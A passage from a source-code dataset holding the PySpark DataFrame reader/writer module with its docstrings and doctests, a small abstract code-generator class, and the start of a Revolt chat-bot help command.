If None is given, just returns None, instead of converting it to string "None".
"""
if isinstance(value, bool):
return str(value).lower()
elif value is None:
return value
else:
return str(value)
class OptionUtils(object):
def _set_opts(self, schema=None, **options):
"""
        Set named options (filtering out those whose value is None)
"""
if schema is not None:
self.schema(schema)
for k, v in options.items():
if v is not None:
self.option(k, v)
class DataFrameReader(OptionUtils):
"""
Interface used to load a :class:`DataFrame` from external storage systems
(e.g. file systems, key-value stores, etc). Use :func:`spark.read`
to access this.
.. versionadded:: 1.4
"""
def __init__(self, spark):
self._jreader = spark._ssql_ctx.read()
self._spark = spark
def _df(self, jdf):
from pyspark.sql.dataframe import DataFrame
return DataFrame(jdf, self._spark)
@since(1.4)
def format(self, source):
"""Specifies the input data source format.
:param source: string, name of the data source, e.g. 'json', 'parquet'.
>>> df = spark.read.format('json').load('python/test_support/sql/people.json')
>>> df.dtypes
[('age', 'bigint'), ('name', 'string')]
"""
self._jreader = self._jreader.format(source)
return self
@since(1.4)
def schema(self, schema):
"""Specifies the input schema.
Some data sources (e.g. JSON) can infer the input schema automatically from data.
By specifying the schema here, the underlying data source can skip the schema
inference step, and thus speed up data loading.
:param schema: a :class:`pyspark.sql.types.StructType` object
"""
from pyspark.sql import SparkSession
if not isinstance(schema, StructType):
raise TypeError("schema should be StructType")
spark = SparkSession.builder.getOrCreate()
jschema = spark._jsparkSession.parseDataType(schema.json())
self._jreader = self._jreader.schema(jschema)
return self
@since(1.5)
def option(self, key, value):
"""Adds an input option for the underlying data source.
You can set the following option(s) for reading files:
* ``timeZone``: sets the string that indicates a timezone to be used to parse timestamps
in the JSON/CSV datasources or partition values.
If it isn't set, it uses the default value, session local timezone.
"""
self._jreader = self._jreader.option(key, to_str(value))
return self
@since(1.4)
def options(self, **options):
"""Adds input options for the underlying data source.
You can set the following option(s) for reading files:
* ``timeZone``: sets the string that indicates a timezone to be used to parse timestamps
in the JSON/CSV datasources or partition values.
If it isn't set, it uses the default value, session local timezone.
"""
for k in options:
self._jreader = self._jreader.option(k, to_str(options[k]))
return self
@since(1.4)
def load(self, path=None, format=None, schema=None, **options):
"""Loads data from a data source and returns it as a :class`DataFrame`.
:param path: optional string or a list of string for file-system backed data sources.
:param format: optional string for format of the data source. Default to 'parquet'.
:param schema: optional :class:`pyspark.sql.types.StructType` for the input schema.
:param options: all other string options
>>> df = spark.read.load('python/test_support/sql/parquet_partitioned', opt1=True,
... opt2=1, opt3='str')
>>> df.dtypes
[('name', 'string'), ('year', 'int'), ('month', 'int'), ('day', 'int')]
>>> df = spark.read.format('json').load(['python/test_support/sql/people.json',
... 'python/test_support/sql/people1.json'])
>>> df.dtypes
[('age', 'bigint'), ('aka', 'string'), ('name', 'string')]
"""
if format is not None:
self.format(format)
if schema is not None:
self.schema(schema)
self.options(**options)
if isinstance(path, basestring):
return self._df(self._jreader.load(path))
elif path is not None:
if type(path) != list:
path = [path]
return self._df(self._jreader.load(self._spark._sc._jvm.PythonUtils.toSeq(path)))
else:
return self._df(self._jreader.load())
@since(1.4)
def json(self, path, schema=None, primitivesAsString=None, prefersDecimal=None,
allowComments=None, allowUnquotedFieldNames=None, allowSingleQuotes=None,
allowNumericLeadingZero=None, allowBackslashEscapingAnyCharacter=None,
mode=None, columnNameOfCorruptRecord=None, dateFormat=None, timestampFormat=None,
multiLine=None):
"""
Loads JSON files and returns the results as a :class:`DataFrame`.
`JSON Lines <http://jsonlines.org/>`_ (newline-delimited JSON) is supported by default.
For JSON (one record per file), set the ``multiLine`` parameter to ``true``.
If the ``schema`` parameter is not specified, this function goes
through the input once to determine the input schema.
:param path: string represents path to the JSON dataset, or a list of paths,
or RDD of Strings storing JSON objects.
:param schema: an optional :class:`pyspark.sql.types.StructType` for the input schema.
:param primitivesAsString: infers all primitive values as a string type. If None is set,
it uses the default value, ``false``.
:param prefersDecimal: infers all floating-point values as a decimal type. If the values
do not fit in decimal, then it infers them as doubles. If None is
set, it uses the default value, ``false``.
:param allowComments: ignores Java/C++ style comment in JSON records. If None is set,
it uses the default value, ``false``.
:param allowUnquotedFieldNames: allows unquoted JSON field names. If None is set,
it uses the default value, ``false``.
:param allowSingleQuotes: allows single quotes in addition to double quotes. If None is
set, it uses the default value, ``true``.
:param allowNumericLeadingZero: allows leading zeros in numbers (e.g. 00012). If None is
set, it uses the default value, ``false``.
:param allowBackslashEscapingAnyCharacter: allows accepting quoting of all character
using backslash quoting mechanism. If None is
set, it uses the default value, ``false``.
:param mode: allows a mode for dealing with corrupt records during parsing. If None is
set, it uses the default value, ``PERMISSIVE``.
* ``PERMISSIVE`` : sets other fields to ``null`` when it meets a corrupted \
record, and puts the malformed string into a field configured by \
                  ``columnNameOfCorruptRecord``. To keep corrupt records, a user can set \
                  a string type field named ``columnNameOfCorruptRecord`` in a user-defined \
schema. If a schema does not have the field, it drops corrupt records during \
parsing. When inferring a schema, it implicitly adds a \
``columnNameOfCorruptRecord`` field in an output schema.
* ``DROPMALFORMED`` : ignores the whole corrupted records.
* ``FAILFAST`` : throws an exception when it meets corrupted records.
:param columnNameOfCorruptRecord: allows renaming the new field having malformed string
created by ``PERMISSIVE`` mode. This overrides
``spark.sql.columnNameOfCorruptRecord``. If None is set,
it uses the value specified in
``spark.sql.columnNameOfCorruptRecord``.
:param dateFormat: sets the string that indicates a date format. Custom date formats
follow the formats at ``java.text.SimpleDateFormat``. This
applies to date type. If None is set, it uses the
default value, ``yyyy-MM-dd``.
:param timestampFormat: sets the string that indicates a timestamp format. Custom date
formats follow the formats at ``java.text.SimpleDateFormat``.
This applies to timestamp type. If None is set, it uses the
default value, ``yyyy-MM-dd'T'HH:mm:ss.SSSXXX``.
:param multiLine: parse one record, which may span multiple lines, per file. If None is
set, it uses the default value, ``false``.
>>> df1 = spark.read.json('python/test_support/sql/people.json')
>>> df1.dtypes
[('age', 'bigint'), ('name', 'string')]
>>> rdd = sc.textFile('python/test_support/sql/people.json')
>>> df2 = spark.read.json(rdd)
>>> df2.dtypes
[('age', 'bigint'), ('name', 'string')]
"""
self._set_opts(
schema=schema, primitivesAsString=primitivesAsString, prefersDecimal=prefersDecimal,
allowComments=allowComments, allowUnquotedFieldNames=allowUnquotedFieldNames,
allowSingleQuotes=allowSingleQuotes, allowNumericLeadingZero=allowNumericLeadingZero,
allowBackslashEscapingAnyCharacter=allowBackslashEscapingAnyCharacter,
mode=mode, columnNameOfCorruptRecord=columnNameOfCorruptRecord, dateFormat=dateFormat,
timestampFormat=timestampFormat, multiLine=multiLine)
if isinstance(path, basestring):
path = [path]
if type(path) == list:
return self._df(self._jreader.json(self._spark._sc._jvm.PythonUtils.toSeq(path)))
elif isinstance(path, RDD):
def func(iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = path.mapPartitions(func)
keyed._bypass_serializer = True
jrdd = keyed._jrdd.map(self._spark._jvm.BytesToString())
return self._df(self._jreader.json(jrdd))
else:
raise TypeError("path can be only string, list or RDD")
@since(1.4)
def table(self, tableName):
"""Returns the specified table as a :class:`DataFrame`.
:param tableName: string, name of the table.
>>> df = spark.read.parquet('python/test_support/sql/parquet_partitioned')
>>> df.createOrReplaceTempView('tmpTable')
>>> spark.read.table('tmpTable').dtypes
[('name', 'string'), ('year', 'int'), ('month', 'int'), ('day', 'int')]
"""
return self._df(self._jreader.table(tableName))
@since(1.4)
def parquet(self, *paths):
"""Loads Parquet files, returning the result as a :class:`DataFrame`.
You can set the following Parquet-specific option(s) for reading Parquet files:
* ``mergeSchema``: sets whether we should merge schemas collected from all \
Parquet part-files. This will override ``spark.sql.parquet.mergeSchema``. \
The default value is specified in ``spark.sql.parquet.mergeSchema``.
>>> df = spark.read.parquet('python/test_support/sql/parquet_partitioned')
>>> df.dtypes
[('name', 'string'), ('year', 'int'), ('month', 'int'), ('day', 'int')]
"""
return self._df(self._jreader.parquet(_to_seq(self._spark._sc, paths)))
@ignore_unicode_prefix
@since(1.6)
def text(self, paths):
"""
Loads text files and returns a :class:`DataFrame` whose schema starts with a
string column named "value", and followed by partitioned columns if there
are any.
Each line in the text file is a new row in the resulting DataFrame.
:param paths: string, or list of strings, for input path(s).
>>> df = spark.read.text('python/test_support/sql/text-test.txt')
>>> df.collect()
[Row(value=u'hello'), Row(value=u'this')]
"""
if isinstance(paths, basestring):
paths = [paths]
return self._df(self._jreader.text(self._spark._sc._jvm.PythonUtils.toSeq(paths)))
@since(2.0)
def csv(self, path, schema=None, sep=None, encoding=None, quote=None, escape=None,
comment=None, header=None, inferSchema=None, ignoreLeadingWhiteSpace=None,
ignoreTrailingWhiteSpace=None, nullValue=None, nanValue=None, positiveInf=None,
negativeInf=None, dateFormat=None, timestampFormat=None, maxColumns=None,
maxCharsPerColumn=None, maxMalformedLogPerPartition=None, mode=None,
columnNameOfCorruptRecord=None, multiLine=None):
"""Loads a CSV file and returns the result as a :class:`DataFrame`.
This function will go through the input once to determine the input schema if
``inferSchema`` is enabled. To avoid going through the entire data once, disable
``inferSchema`` option or specify the schema explicitly using ``schema``.
:param path: string, or list of strings, for input path(s).
:param schema: an optional :class:`pyspark.sql.types.StructType` for the input schema.
:param sep: sets the single character as a separator for each field and value.
If None is set, it uses the default value, ``,``.
:param encoding: decodes the CSV files by the given encoding type. If None is set,
it uses the default value, ``UTF-8``.
:param quote: sets the single character used for escaping quoted values where the
separator can be part of the value. If None is set, it uses the default
value, ``"``. If you would like to turn off quotations, you need to set an
empty string.
:param escape: sets the single character used for escaping quotes inside an already
quoted value. If None is set, it uses the default value, ``\``.
:param comment: sets the single character used for skipping lines beginning with this
character. By default (None), it is disabled.
:param header: uses the first line as names of columns. If None is set, it uses the
default value, ``false``.
:param inferSchema: infers the input schema automatically from data. It requires one extra
pass over the data. If None is set, it uses the default value, ``false``.
:param ignoreLeadingWhiteSpace: A flag indicating whether or not leading whitespaces from
values being read should be skipped. If None is set, it
uses the default value, ``false``.
:param ignoreTrailingWhiteSpace: A flag indicating whether or not trailing whitespaces from
values being read should be skipped. If None is set, it
uses the default value, ``false``.
:param nullValue: sets the string representation of a null value. If None is set, it uses
the default value, empty string. Since 2.0.1, this ``nullValue`` param
applies to all supported types including the string type.
:param nanValue: sets the string representation of a non-number value. If None is set, it
uses the default value, ``NaN``.
:param positiveInf: sets the string representation of a positive infinity value. If None
is set, it uses the default value, ``Inf``.
:param negativeInf: sets the string representation of a negative infinity value. If None
                            is set, it uses the default value, ``-Inf``.
:param dateFormat: sets the string that indicates a date format. Custom date formats
follow the formats at ``java.text.SimpleDateFormat``. This
applies to date type. If None is set, it uses the
default value, ``yyyy-MM-dd``.
:param timestampFormat: sets the string that indicates a timestamp format. Custom date
formats follow the formats at ``java.text.SimpleDateFormat``.
This applies to timestamp type. If None is set, it uses the
default value, ``yyyy-MM-dd'T'HH:mm:ss.SSSXXX``.
:param maxColumns: defines a hard limit of how many columns a record can have. If None is
set, it uses the default value, ``20480``.
:param maxCharsPerColumn: defines the maximum number of characters allowed for any given
value being read. If None is set, it uses the default value,
``-1`` meaning unlimited length.
:param maxMalformedLogPerPartition: this parameter is no longer used since Spark 2.2.0.
If specified, it is ignored.
:param mode: allows a mode for dealing with corrupt records during parsing. If None is
set, it uses the default value, ``PERMISSIVE``.
* ``PERMISSIVE`` : sets other fields to ``null`` when it meets a corrupted \
record, and puts the malformed string into a field configured by \
                  ``columnNameOfCorruptRecord``. To keep corrupt records, a user can set \
                  a string type field named ``columnNameOfCorruptRecord`` in a \
user-defined schema. If a schema does not have the field, it drops corrupt \
records during parsing. When a length of parsed CSV tokens is shorter than \
an expected length of a schema, it sets `null` for extra fields.
* ``DROPMALFORMED`` : ignores the whole corrupted records.
* ``FAILFAST`` : throws an exception when it meets corrupted records.
:param columnNameOfCorruptRecord: allows renaming the new field having malformed string
created by ``PERMISSIVE`` mode. This overrides
``spark.sql.columnNameOfCorruptRecord``. If None is set,
it uses the value specified in
``spark.sql.columnNameOfCorruptRecord``.
:param multiLine: parse records, which may span multiple lines. If None is
set, it uses the default value, ``false``.
>>> df = spark.read.csv('python/test_support/sql/ages.csv')
>>> df.dtypes
[('_c0', 'string'), ('_c1', 'string')]
"""
self._set_opts(
schema=schema, sep=sep, encoding=encoding, quote=quote, escape=escape, comment=comment,
header=header, inferSchema=inferSchema, ignoreLeadingWhiteSpace=ignoreLeadingWhiteSpace,
ignoreTrailingWhiteSpace=ignoreTrailingWhiteSpace, nullValue=nullValue,
nanValue=nanValue, positiveInf=positiveInf, negativeInf=negativeInf,
dateFormat=dateFormat, timestampFormat=timestampFormat, maxColumns=maxColumns,
maxCharsPerColumn=maxCharsPerColumn,
maxMalformedLogPerPartition=maxMalformedLogPerPartition, mode=mode,
columnNameOfCorruptRecord=columnNameOfCorruptRecord, multiLine=multiLine)
if isinstance(path, basestring):
path = [path]
return self._df(self._jreader.csv(self._spark._sc._jvm.PythonUtils.toSeq(path)))
@since(1.5)
def orc(self, path):
"""Loads ORC files, returning the result as a :class:`DataFrame`.
.. note:: Currently ORC support is only available together with Hive support.
>>> df = spark.read.orc('python/test_support/sql/orc_partitioned')
>>> df.dtypes
[('a', 'bigint'), ('b', 'int'), ('c', 'int')]
"""
if isinstance(path, basestring):
path = [path]
return self._df(self._jreader.orc(_to_seq(self._spark._sc, path)))
@since(1.4)
def jdbc(self, url, table, column=None, lowerBound=None, upperBound=None, numPartitions=None,
predicates=None, properties=None):
"""
Construct a :class:`DataFrame` representing the database table named ``table``
accessible via JDBC URL ``url`` and connection ``properties``.
Partitions of the table will be retrieved in parallel if either ``column`` or
        ``predicates`` is specified. ``lowerBound``, ``upperBound`` and ``numPartitions``
        are needed when ``column`` is specified.
If both ``column`` and ``predicates`` are specified, ``column`` will be used.
.. note:: Don't create too many partitions in parallel on a large cluster; \
otherwise Spark might crash your external database systems.
:param url: a JDBC URL of the form ``jdbc:subprotocol:subname``
:param table: the name of the table
:param column: the name of an integer column that will be used for partitioning;
if this parameter is specified, then ``numPartitions``, ``lowerBound``
(inclusive), and ``upperBound`` (exclusive) will form partition strides
for generated WHERE clause expressions used to split the column
``column`` evenly
:param lowerBound: the minimum value of ``column`` used to decide partition stride
:param upperBound: the maximum value of ``column`` used to decide partition stride
:param numPartitions: the number of partitions
:param predicates: a list of expressions suitable for inclusion in WHERE clauses;
each one defines one partition of the :class:`DataFrame`
:param properties: a dictionary of JDBC database connection arguments. Normally at
least properties "user" and "password" with their corresponding values.
For example { 'user' : 'SYSTEM', 'password' : 'mypassword' }
:return: a DataFrame
"""
if properties is None:
properties = dict()
jprop = JavaClass("java.util.Properties", self._spark._sc._gateway._gateway_client)()
for k in properties:
jprop.setProperty(k, properties[k])
if column is not None:
assert lowerBound is not None, "lowerBound can not be None when ``column`` is specified"
assert upperBound is not None, "upperBound can not be None when ``column`` is specified"
assert numPartitions is not None, \
"numPartitions can not be None when ``column`` is specified"
return self._df(self._jreader.jdbc(url, table, column, int(lowerBound), int(upperBound),
int(numPartitions), jprop))
if predicates is not None:
gateway = self._spark._sc._gateway
jpredicates = utils.toJArray(gateway, gateway.jvm.java.lang.String, predicates)
return self._df(self._jreader.jdbc(url, table, jpredicates, jprop))
return self._df(self._jreader.jdbc(url, table, jprop))
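# A hedged usage sketch of the partitioned jdbc() read above; the URL, table
# name and credentials are hypothetical, not taken from this module:
#
#     df = spark.read.jdbc(
#         "jdbc:postgresql://host/db", "people", column="id",
#         lowerBound=0, upperBound=10000, numPartitions=4,
#         properties={'user': 'SYSTEM', 'password': 'mypassword'})
#
# Each of the 4 partitions then scans its own stride of ``id`` values via a
# generated WHERE clause.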
class DataFrameWriter(OptionUtils):
"""
Interface used to write a :class:`DataFrame` to external storage systems
(e.g. file systems, key-value stores, etc). Use :func:`DataFrame.write`
to access this.
.. versionadded:: 1.4
"""
def __init__(self, df):
self._df = df
self._spark = df.sql_ctx
self._jwrite = df._jdf.write()
def _sq(self, jsq):
from pyspark.sql.streaming import StreamingQuery
return StreamingQuery(jsq)
@since(1.4)
def mode(self, saveMode):
"""Specifies the behavior when data or table already exists.
Options include:
* `append`: Append contents of this :class:`DataFrame` to existing data.
* `overwrite`: Overwrite existing data.
* `error`: Throw an exception if data already exists.
* `ignore`: Silently ignore this operation if data already exists.
>>> df.write.mode('append').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
"""
# At the JVM side, the default value of mode is already set to "error".
# So, if the given saveMode is None, we will not call JVM-side's mode method.
if saveMode is not None:
self._jwrite = self._jwrite.mode(saveMode)
return self
@since(1.4)
def format(self, source):
"""Specifies the underlying output data source.
:param source: string, name of the data source, e.g. 'json', 'parquet'.
>>> df.write.format('json').save(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self._jwrite = self._jwrite.format(source)
return self
@since(1.5)
def option(self, key, value):
"""Adds an output option for the underlying data source.
You can set the following option(s) for writing files:
* ``timeZone``: sets the string that indicates a timezone to be used to format
timestamps in the JSON/CSV datasources or partition values.
If it isn't set, it uses the default value, session local timezone.
"""
self._jwrite = self._jwrite.option(key, to_str(value))
return self
@since(1.4)
def options(self, **options):
"""Adds output options for the underlying data source.
You can set the following option(s) for writing files:
* ``timeZone``: sets the string that indicates a timezone to be used to format
timestamps in the JSON/CSV datasources or partition values.
If it isn't set, it uses the default value, session local timezone.
"""
for k in options:
self._jwrite = self._jwrite.option(k, to_str(options[k]))
return self
@since(1.4)
def partitionBy(self, *cols):
"""Partitions the output by the given columns on the file system.
If specified, the output is laid out on the file system similar
to Hive's partitioning scheme.
:param cols: name of columns
>>> df.write.partitionBy('year', 'month').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
"""
if len(cols) == 1 and isinstance(cols[0], (list, tuple)):
cols = cols[0]
self._jwrite = self._jwrite.partitionBy(_to_seq(self._spark._sc, cols))
return self
@since(1.4)
def save(self, path=None, format=None, mode=None, partitionBy=None, **options):
"""Saves the contents of the :class:`DataFrame` to a data source.
The data source is specified by the ``format`` and a set of ``options``.
If ``format`` is not specified, the default data source configured by
``spark.sql.sources.default`` will be used.
:param path: the path in a Hadoop supported file system
:param format: the format used to save
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param partitionBy: names of partitioning columns
:param options: all other string options
>>> df.write.mode('append').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode).options(**options)
if partitionBy is not None:
self.partitionBy(partitionBy)
if format is not None:
self.format(format)
if path is None:
self._jwrite.save()
else:
self._jwrite.save(path)
@since(1.4)
def insertInto(self, tableName, overwrite=False):
"""Inserts the content of the :class:`DataFrame` to the specified table.
        It requires that the schema of the :class:`DataFrame` is the same as the
schema of the table.
Optionally overwriting any existing data.
"""
self._jwrite.mode("overwrite" if overwrite else "append").insertInto(tableName)
@since(1.4)
def saveAsTable(self, name, format=None, mode=None, partitionBy=None, **options):
"""Saves the content of the :class:`DataFrame` as the specified table.
In the case the table already exists, behavior of this function depends on the
save mode, specified by the `mode` function (default to throwing an exception).
When `mode` is `Overwrite`, the schema of the :class:`DataFrame` does not need to be
the same as that of the existing table.
* `append`: Append contents of this :class:`DataFrame` to existing data.
* `overwrite`: Overwrite existing data.
* `error`: Throw an exception if data already exists.
* `ignore`: Silently ignore this operation if data already exists.
:param name: the table name
:param format: the format used to save
:param mode: one of `append`, `overwrite`, `error`, `ignore` (default: error)
:param partitionBy: names of partitioning columns
:param options: all other string options
"""
self.mode(mode).options(**options)
if partitionBy is not None:
self.partitionBy(partitionBy)
if format is not None:
self.format(format)
self._jwrite.saveAsTable(name)
@since(1.4)
def json(self, path, mode=None, compression=None, dateFormat=None, timestampFormat=None):
"""Saves the content of the :class:`DataFrame` in JSON format
(`JSON Lines text format or newline-delimited JSON <http://jsonlines.org/>`_) at the
specified path.
:param path: the path in any Hadoop supported file system
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param compression: compression codec to use when saving to file. This can be one of the
known case-insensitive shorten names (none, bzip2, gzip, lz4,
snappy and deflate).
:param dateFormat: sets the string that indicates a date format. Custom date formats
follow the formats at ``java.text.SimpleDateFormat``. This
applies to date type. If None is set, it uses the
default value, ``yyyy-MM-dd``.
:param timestampFormat: sets the string that indicates a timestamp format. Custom date
formats follow the formats at ``java.text.SimpleDateFormat``.
This applies to timestamp type. If None is set, it uses the
default value, ``yyyy-MM-dd'T'HH:mm:ss.SSSXXX``.
>>> df.write.json(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode)
self._set_opts(
compression=compression, dateFormat=dateFormat, timestampFormat=timestampFormat)
self._jwrite.json(path)
@since(1.4)
def parquet(self, path, mode=None, partitionBy=None, compression=None):
"""Saves the content of the :class:`DataFrame` in Parquet format at the specified path.
:param path: the path in any Hadoop supported file system
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param partitionBy: names of partitioning columns
:param compression: compression codec to use when saving to file. This can be one of the
                            known case-insensitive shortened names (none, snappy, gzip, and lzo).
This will override ``spark.sql.parquet.compression.codec``. If None
is set, it uses the value specified in
``spark.sql.parquet.compression.codec``.
>>> df.write.parquet(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode)
if partitionBy is not None:
self.partitionBy(partitionBy)
self._set_opts(compression=compression)
self._jwrite.parquet(path)
@since(1.6)
def text(self, path, compression=None):
"""Saves the content of the DataFrame in a text file at the specified path.
:param path: the path in any Hadoop supported file system
:param compression: compression codec to use when saving to file. This can be one of the
                            known case-insensitive shortened names (none, bzip2, gzip, lz4,
snappy and deflate).
The DataFrame must have only one column that is of string type.
Each row becomes a new line in the output file.
"""
self._set_opts(compression=compression)
self._jwrite.text(path)
@since(2.0)
def csv(self, path, mode=None, compression=None, sep=None, quote=None, escape=None,
header=None, nullValue=None, escapeQuotes=None, quoteAll=None, dateFormat=None,
timestampFormat=None, ignoreLeadingWhiteSpace=None, ignoreTrailingWhiteSpace=None):
"""Saves the content of the :class:`DataFrame` in CSV format at the specified path.
:param path: the path in any Hadoop supported file system
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param compression: compression codec to use when saving to file. This can be one of the
                            known case-insensitive shortened names (none, bzip2, gzip, lz4,
snappy and deflate).
:param sep: sets the single character as a separator for each field and value. If None is
set, it uses the default value, ``,``.
:param quote: sets the single character used for escaping quoted values where the
separator can be part of the value. If None is set, it uses the default
value, ``"``. If you would like to turn off quotations, you need to set an
empty string.
:param escape: sets the single character used for escaping quotes inside an already
quoted value. If None is set, it uses the default value, ``\``
:param escapeQuotes: a flag indicating whether values containing quotes should always
be enclosed in quotes. If None is set, it uses the default value
``true``, escaping all values containing a quote character.
:param quoteAll: a flag indicating whether all values should always be enclosed in
quotes. If None is set, it uses the default value ``false``,
only escaping values containing a quote character.
:param header: writes the names of columns as the first line. If None is set, it uses
the default value, ``false``.
:param nullValue: sets the string representation of a null value. If None is set, it uses
the default value, empty string.
:param dateFormat: sets the string that indicates a date format. Custom date formats
follow the formats at ``java.text.SimpleDateFormat``. This
applies to date type. If None is set, it uses the
default value, ``yyyy-MM-dd``.
:param timestampFormat: sets the string that indicates a timestamp format. Custom date
formats follow the formats at ``java.text.SimpleDateFormat``.
This applies to timestamp type. If None is set, it uses the
default value, ``yyyy-MM-dd'T'HH:mm:ss.SSSXXX``.
:param ignoreLeadingWhiteSpace: a flag indicating whether or not leading whitespaces from
values being written should be skipped. If None is set, it
uses the default value, ``true``.
:param ignoreTrailingWhiteSpace: a flag indicating whether or not trailing whitespaces from
values being written should be skipped. If None is set, it
uses the default value, ``true``.
>>> df.write.csv(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode)
self._set_opts(compression=compression, sep=sep, quote=quote, escape=escape, header=header,
nullValue=nullValue, escapeQuotes=escapeQuotes, quoteAll=quoteAll,
dateFormat=dateFormat, timestampFormat=timestampFormat,
ignoreLeadingWhiteSpace=ignoreLeadingWhiteSpace,
ignoreTrailingWhiteSpace=ignoreTrailingWhiteSpace)
self._jwrite.csv(path)
@since(1.5)
def orc(self, path, mode=None, partitionBy=None, compression=None):
"""Saves the content of the :class:`DataFrame` in ORC format at the specified path.
.. note:: Currently ORC support is only available together with Hive support.
:param path: the path in any Hadoop supported file system
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param partitionBy: names of partitioning columns
:param compression: compression codec to use when saving to file. This can be one of the
                            known case-insensitive shortened names (none, snappy, zlib, and lzo).
This will override ``orc.compress``. If None is set, it uses the
default value, ``snappy``.
>>> orc_df = spark.read.orc('python/test_support/sql/orc_partitioned')
>>> orc_df.write.orc(os.path.join(tempfile.mkdtemp(), 'data'))
"""
self.mode(mode)
if partitionBy is not None:
self.partitionBy(partitionBy)
self._set_opts(compression=compression)
self._jwrite.orc(path)
@since(1.4)
def jdbc(self, url, table, mode=None, properties=None):
"""Saves the content of the :class:`DataFrame` to an external database table via JDBC.
.. note:: Don't create too many partitions in parallel on a large cluster; \
otherwise Spark might crash your external database systems.
:param url: a JDBC URL of the form ``jdbc:subprotocol:subname``
:param table: Name of the table in the external database.
:param mode: specifies the behavior of the save operation when data already exists.
* ``append``: Append contents of this :class:`DataFrame` to existing data.
* ``overwrite``: Overwrite existing data.
* ``ignore``: Silently ignore this operation if data already exists.
* ``error`` (default case): Throw an exception if data already exists.
:param properties: a dictionary of JDBC database connection arguments. Normally at
least properties "user" and "password" with their corresponding values.
For example { 'user' : 'SYSTEM', 'password' : 'mypassword' }
"""
if properties is None:
properties = dict()
jprop = JavaClass("java.util.Properties", self._spark._sc._gateway._gateway_client)()
for k in properties:
jprop.setProperty(k, properties[k])
self._jwrite.mode(mode).jdbc(url, table, jprop)
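# Illustrative sketch (not part of the original module): how the writer API
# above composes in practice. `df` is assumed to be an existing DataFrame and
# `path`/`url` caller-supplied locations; nothing here runs at import time.
def _example_writer_usage(df, path, url):
    # Overwrite Parquet output, partitioned by a hypothetical 'year' column.
    df.write.mode('overwrite').partitionBy('year').parquet(path)
    # Append the same rows to a JDBC table named 'events' (made-up name),
    # passing credentials through the properties dict as documented above.
    df.write.jdbc(url, 'events', mode='append',
                  properties={'user': 'SYSTEM', 'password': 'mypassword'})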
def _test():
import doctest
import os
import tempfile
import py4j
from pyspark.context import SparkContext
from pyspark.sql import SparkSession, Row
import pyspark.sql.readwriter
os.chdir(os.environ["SPARK_HOME"])
globs = pyspark.sql.readwriter.__dict__.copy()
sc = SparkContext('local[4]', 'PythonTest')
try:
spark = SparkSession.builder.enableHiveSupport().getOrCreate()
except py4j.protocol.Py4JError:
spark = SparkSession(sc)
globs['tempfile'] = tempfile
globs['os'] = os
globs['sc'] = sc
globs['spark'] = spark
globs['df'] = spark.read.parquet('python/test_support/sql/parquet_partitioned')
(failure_count, test_count) = doctest.testmod(
pyspark.sql.readwriter, globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE | doctest.REPORT_NDIFF)
sc.stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
avg_line_length: 51.496495 | max_line_length: 100 | alphanum_fraction: 0.615685

hexsha: 6bf3e7adb6861c0e45c4fb4baded969d29c021ca | size: 1,024 | ext: py | lang: Python
repo_path: whitfield/gen/__init__.py | repo_name: npmccallum/whitfield | repo_head_hexsha: fdbc0c6444cb3b3b48351224525543171d0c60a4 | licenses: ["Apache-2.0"]
max_stars_count: null | max_issues_count: null | max_forks_count: null
#
# Copyright: 2017 Red Hat, Inc.
# Author: Nathaniel McCallum <npmccallum@redhat.com>
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import abc
class Generator(abc.ABC):
@abc.abstractmethod
def __call__(self, ast):
"Generates output from the AST. Yields lines."
avg_line_length: 34.133333 | max_line_length: 62 | alphanum_fraction: 0.75293

hexsha: 9926e36731cae6a20951ddc04fe23f008aefdad6 | size: 1,560 | ext: py | lang: Python
repo_path: revoltCommands/help.py | repo_name: asoji/Yiski | repo_head_hexsha: 8c64a04bb4e3b3f72a70de28203be2c3618c5f9c | licenses: ["MIT"]
max_stars_count: null
max_issues_count: 11 (2022-01-27T08:02:41.000Z to 2022-02-10T23:32:29.000Z)
max_forks_count: 1 (2022-01-27T06:11:48.000Z to 2022-01-27T06:11:48.000Z)
import defectio
from defectio import ext
from defectio.ext import commands
from loguru import logger
from mainRevolt import botPrefix
class HelpRevolt(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command()
async def help(self, ctx):
await ctx.reply(
"| Command Name | Description | Command |\n" +
